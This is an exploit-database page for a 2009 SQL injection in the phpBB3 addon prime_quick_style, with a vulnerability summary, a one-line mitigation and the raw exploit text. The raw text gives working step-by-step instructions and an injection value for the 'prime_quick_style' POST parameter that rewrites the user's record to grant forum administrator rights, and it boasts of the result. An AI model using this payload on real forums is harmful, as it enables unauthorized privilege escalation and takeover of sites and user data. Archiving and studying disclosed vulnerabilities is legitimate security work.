header-logo
Suggest Exploit
vendor:
phpBB3 addon prime_quick_style
by:
-SmoG-
7,5
CVSS
HIGH
Injection
89
CWE
Product Name: phpBB3 addon prime_quick_style
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

phpBB3 addon prime_quick_style GetAdmin Exploit

The vulnerability is found in the phpBB3 addon prime_quick_style. The POST parameter 'prime_quick_style' is injectable. After login, the user can manipulate the content from the 'prime_quick_style'-parameter. This will result in an update query to the USER_TABLE with the user_type set to 3 and user_permissions set to '', granting the user admin privileges.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in an update query.
Source

Exploit-DB raw data:

##########################################################################
#
#	phpBB3 addon prime_quick_style GetAdmin Exploit
#
#	Vulnerability found and exploited by -SmoG-
#
#	target file: prime_quick_style.php
#
#
#   vuln: POST parameter "prime_quick_style" is injectable.
#   source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625
#
#	HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter.
#	example: prime_quick_style = "5,user_type = 3, user_permissions = ''"
#  
#	query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId"
#
#	gratz, now u will be an admin  :) 
#
#	--- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! ---
#
#
#														-( by -SmoG- )-
##########################################################################

# milw0rm.com [2009-09-01]